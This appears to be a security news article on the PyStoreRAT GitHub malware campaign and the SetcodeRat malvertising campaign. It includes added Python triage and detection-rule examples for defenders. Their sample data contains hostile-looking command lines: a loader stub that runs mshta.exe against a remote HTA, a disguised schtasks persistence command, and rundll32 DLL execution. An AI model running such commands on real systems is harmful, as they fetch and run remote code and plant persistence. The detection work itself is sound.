Cybersecurity researchers are warning of a new campaign that leverages GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based remote access Trojan (RAT) dubbed PyStoreRAT.
“These repositories, often themed around development utilities or OSINT tools, contain just a few lines of code responsible for silently downloading a remote HTA file and running it via ‘mshta.exe,’” Morphisec researcher Yonatan Edri said in a report shared with The Hacker News.
PyStoreRAT is described as a “modular, multi-stage” implant capable of running EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware has also been observed deploying a follow-on payload: the information stealer known as Rhadamanthys.
The attack chain relies on Python or JavaScript loader stubs embedded in GitHub repositories disguised as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities designed to appeal to analysts and developers.
The first signs of the campaign date back to mid-June 2025, and new repositories have been rolled out steadily ever since. The tools are promoted through social media platforms such as YouTube and X, and the repositories’ star and fork counts are artificially inflated to lend them credibility, a technique reminiscent of the Stargazers Ghost Network.
The attackers behind the campaign used newly created GitHub accounts, or accounts that had been dormant for months, to publish the repositories, then quietly introduced the malicious payloads as “maintenance” commits in October and November, after the tools had started gaining popularity and appeared on GitHub’s trending list.
In fact, many of the tools did not work as advertised: some simply displayed static menus or non-interactive interfaces, while others performed minimal placeholder operations. The goal was to feign legitimacy by abusing the inherent trust placed in GitHub and trick users into running the loader stub that kicks off the infection chain.
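Before running a trending repository on a workstation, a quick static triage of its source for the loader-stub shape described above (a handful of lines that fetch a remote URL and hand it to mshta.exe) catches the obvious cases. The scanner below is an added example written for this article, not code from Morphisec or from the repositories in question; the indicator names, regexes and weights are this example’s own assumptions, and the two sample files are constructed here (the “stub” uses a non-resolving `.invalid` domain).

```python
import re
from typing import Dict, List, Tuple

# Heuristic indicators for a GitHub "loader stub": a few lines that download a
# remote HTA and run it through mshta.exe. Names, patterns and weights are this
# example's assumptions, not values taken from the Morphisec report.
INDICATORS: List[Tuple[str, "re.Pattern[str]", int]] = [
    ("mshta_reference", re.compile(r"\bmshta(?:\.exe)?\b", re.I), 5),
    ("hta_url", re.compile(r"https?://[^\s'\"]+\.hta\b", re.I), 5),
    ("remote_url", re.compile(r"https?://[^\s'\"]+", re.I), 1),
    ("process_spawn", re.compile(
        r"\b(?:subprocess\.(?:Popen|run|call|check_output)|os\.system|os\.popen"
        r"|child_process|execSync|spawn(?:Sync)?)\b"), 2),
    ("dynamic_eval", re.compile(r"\b(?:eval|exec)\s*\(", re.I), 2),
    ("base64_decode", re.compile(r"\b(?:b64decode|atob|FromBase64String)\b"), 2),
    ("hidden_window", re.compile(
        r"CREATE_NO_WINDOW|windowsHide\s*:\s*true|STARTF_USESHOWWINDOW|SW_HIDE", re.I), 2),
]


def scan_source(text: str) -> Dict[str, int]:
    """Return {indicator_name: hit_count} for one source file."""
    hits: Dict[str, int] = {}
    for name, pattern, _weight in INDICATORS:
        n = len(pattern.findall(text))
        if n:
            hits[name] = n
    return hits


def score(hits: Dict[str, int]) -> int:
    """Weight each indicator once; add a bonus when a remote URL co-occurs with
    a process spawn or an mshta reference, which is the stub shape itself."""
    weights = {name: w for name, _p, w in INDICATORS}
    total = sum(weights[name] for name in hits)
    if "remote_url" in hits and ("process_spawn" in hits or "mshta_reference" in hits):
        total += 3
    return total


def triage_repo(files: Dict[str, str], threshold: int = 8) -> List[Tuple[str, int, Dict[str, int]]]:
    """Score every file and return (path, score, hits) for those at/above threshold."""
    flagged = []
    for path, text in files.items():
        hits = scan_source(text)
        s = score(hits)
        if s >= threshold:
            flagged.append((path, s, hits))
    flagged.sort(key=lambda t: -t[1])
    return flagged


# Constructed sample repository: a plausible OSINT CLI plus a small "maintenance" helper.
SAMPLE_REPO: Dict[str, str] = {
    "osint_tool/cli.py": '''
import argparse, requests

def main():
    p = argparse.ArgumentParser()
    p.add_argument("username")
    args = p.parse_args()
    r = requests.get("https://api.github.com/users/" + args.username)
    print(r.json())
''',
    "osint_tool/update_check.py": '''
import subprocess
# "maintenance" helper (constructed sample; domain does not resolve)
subprocess.Popen(["mshta.exe", "https://cdn.example.invalid/u/update.hta"],
                 creationflags=subprocess.CREATE_NO_WINDOW)
''',
}

if __name__ == "__main__":
    for path, s, hits in triage_repo(SAMPLE_REPO):
        print(f"{path}: score={s} hits={hits}")
```

Scores are only a sorting aid: a legitimate tool that shells out to a URL will also rank, so the output is a reading list for a human, not a verdict. Extending `INDICATORS` with `powershell -enc`, `rundll32` or `msiexec` covers the other module types the RAT supports.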
Running the stub triggers the execution of a remote HTML Application (HTA) payload that delivers PyStoreRAT. The payload profiles the system, checks for administrative privileges, and scans for cryptocurrency wallet-related files, particularly those belonging to Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.
The loader stub also collects the list of installed antivirus products and checks it for the strings “Falcon” (CrowdStrike Falcon) and “Reason” (Cybereason or ReasonLabs) to reduce its visibility. If either is present, it launches ‘mshta.exe’ indirectly through ‘cmd.exe’; otherwise it runs ‘mshta.exe’ directly.

Persistence is achieved through a scheduled task masquerading as an NVIDIA app self-updater. In the final stage, the malware connects to an external server to obtain commands to execute on the host. The supported commands include:
- Download and run an EXE payload containing Rhadamanthys
- Download and unzip a ZIP archive
- Download a malicious DLL and execute it via ‘rundll32.exe’
- Take raw JavaScript code and run it dynamically in memory using eval()
- Download and install an MSI package
- Spawn a secondary ‘mshta.exe’ process to load additional remote HTA payloads
- Run PowerShell commands directly in memory
- Spread via removable drives by replacing legitimate documents with malicious Windows shortcut (LNK) files
- Delete the scheduled task to remove the forensic trail
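The execution chain above (a Python stub launching mshta.exe, optionally via cmd.exe; mshta.exe reaching out to a URL; mshta.exe spawning rundll32.exe, PowerShell, msiexec.exe or a second mshta.exe; and a scheduled task with an NVIDIA-themed name whose action is not an NVIDIA binary) is mostly visible in process-creation telemetry. The rules below are an added detection example written for this article, not Morphisec’s detections; the rule IDs, the set of script hosts, the heuristic that an NVIDIA-named task should point under `C:\Program Files\NVIDIA Corporation`, and the Sysmon-style sample events (including the `.invalid` domain and the fictitious NVIDIA updater path) are all this example’s own assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (Event ID 1 field names).
# These are sample records written for this example, not telemetry from a real infection.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Python311\python.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "python osint_tool.py"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Python311\python.exe",
     "CommandLine": "cmd.exe /c mshta.exe https://cdn.example.invalid/u/update.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta.exe https://cdn.example.invalid/u/update.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'schtasks /Create /SC HOURLY /TN "NVIDIA App SelfUpdate" '
                    '/TR "mshta.exe https://cdn.example.invalid/u/update.hta" /F'},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\x.dll,Run"},
    # A local HTA opened from Explorer: noisy in some environments, but not the chain above.
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    # An NVIDIA-named task whose action lives under the vendor directory (fictitious path).
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /Create /TN "NVIDIA Updater" '
                    r'/TR "C:\Program Files\NVIDIA Corporation\Updater\updater.exe" /SC DAILY'},
]

# Assumed sets for this example; tune them to the estate being monitored.
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "py.exe", "node.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_MSHTA_CHILDREN = {"rundll32.exe", "powershell.exe", "pwsh.exe", "msiexec.exe",
                             "mshta.exe", "schtasks.exe", "cmd.exe"}
NVIDIA_DIR = r"c:\program files\nvidia corporation"
URL_RE = re.compile(r"https?://", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def task_arg(cmd: str, switch: str) -> str:
    """Pull the value of a schtasks switch such as /TN or /TR (quoted or bare)."""
    m = re.search(r"(?i)" + re.escape(switch) + r"\s+(?:\"([^\"]*)\"|(\S+))", cmd)
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def evaluate(event: Dict[str, object]) -> List[str]:
    """Apply the rules to one process-creation event; return the alerts it raises."""
    alerts: List[str] = []
    if event.get("EventID") != 1:
        return alerts
    image = basename(str(event["Image"]))
    parent = basename(str(event["ParentImage"]))
    cmd = str(event["CommandLine"])
    cmd_l = cmd.lower()

    if image == "mshta.exe" and URL_RE.search(cmd):
        alerts.append("R1: mshta.exe launched with a remote URL")
    if image == "mshta.exe" and (parent in SCRIPT_HOSTS or parent == "cmd.exe"):
        alerts.append(f"R2: mshta.exe spawned by {parent}")
    if image == "cmd.exe" and parent in SCRIPT_HOSTS and "mshta" in cmd_l:
        alerts.append(f"R3: {parent} used cmd.exe to launch mshta.exe")
    if parent == "mshta.exe" and image in SUSPICIOUS_MSHTA_CHILDREN:
        alerts.append(f"R4: mshta.exe spawned {image}")
    if image == "schtasks.exe" and "/create" in cmd_l:
        name = task_arg(cmd, "/TN")
        action = task_arg(cmd, "/TR")
        if "nvidia" in name.lower() and not action.lower().startswith(NVIDIA_DIR):
            alerts.append("R5: NVIDIA-themed task whose action is outside the NVIDIA install dir")
        if "mshta" in action.lower() or URL_RE.search(action):
            alerts.append("R6: scheduled task action invokes mshta.exe or a URL")
    return alerts


def detect(events: List[Dict[str, object]]) -> List[Tuple[int, List[str]]]:
    """Return (event_index, alerts) for every event that raised at least one alert."""
    return [(i, a) for i, a in ((i, evaluate(e)) for i, e in enumerate(events)) if a]


def rule_counts(events: List[Dict[str, object]]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for _, alerts in detect(events):
        for a in alerts:
            rid = a.split(":", 1)[0]
            counts[rid] = counts.get(rid, 0) + 1
    return counts


if __name__ == "__main__":
    for idx, alerts in detect(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"])
        for a in alerts:
            print("   ", a)
```

R2 and R4 are the rules worth keeping even when mshta.exe has legitimate internal users: the parent/child relationship is harder for the loader to vary than the command line. Where mshta.exe has no business use at all, blocking it outright (it appears in Microsoft’s recommended WDAC block rules) removes the first stage entirely rather than detecting it after the fact.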
It is currently unclear who is behind the operation, but the presence of Russian-language artifacts and coding patterns suggests an attacker likely of Eastern European origin, Morphisec said.
“PyStoreRAT represents a move towards modular, script-based implants that can adapt to security controls and provide multiple payload formats,” Edri concluded. “By using HTA/JS for execution, a Python loader for delivery, and Falcon-enabled evasion logic, it creates a stealthy first-stage scaffold that traditional EDR solutions can only detect late in the infection chain.”
The disclosure comes as Chinese security vendor QiAnXin detailed another new RAT, codenamed SetcodeRat, that has likely been propagating across the country via malvertising lures since October 2025. Hundreds of computers, including government and corporate machines, are said to have been infected over the course of a month.
“The malicious installation package first checks the victim’s region,” the QiAnXin Threat Intelligence Center said. If the victim is in a non-Chinese region, the package terminates automatically.
The malware masquerades as a legitimate installer for popular programs such as Google Chrome, and only advances to the next stage if the system language is set to Mainland China (zh-CN), Hong Kong (zh-HK), Macau (zh-MO), or Taiwan (zh-TW). Execution also terminates if the connection to the Bilibili URL (“api.bilibili(.)com/x/report/click/now”) fails.
The next step is to launch an executable called “pnm2png.exe”, sideload “zlib1.dll”, and decrypt and execute the contents of a file called “qt.conf”. The decrypted payload is a DLL that embeds the RAT. SetcodeRat can connect to Telegram or to traditional command-and-control (C2) servers to obtain instructions and exfiltrate stolen data.
This gives the malware the ability to take screenshots, log keystrokes, browse and modify folders, start processes, run cmd.exe, set up socket connections, collect system and network connection information, and update itself to newer versions.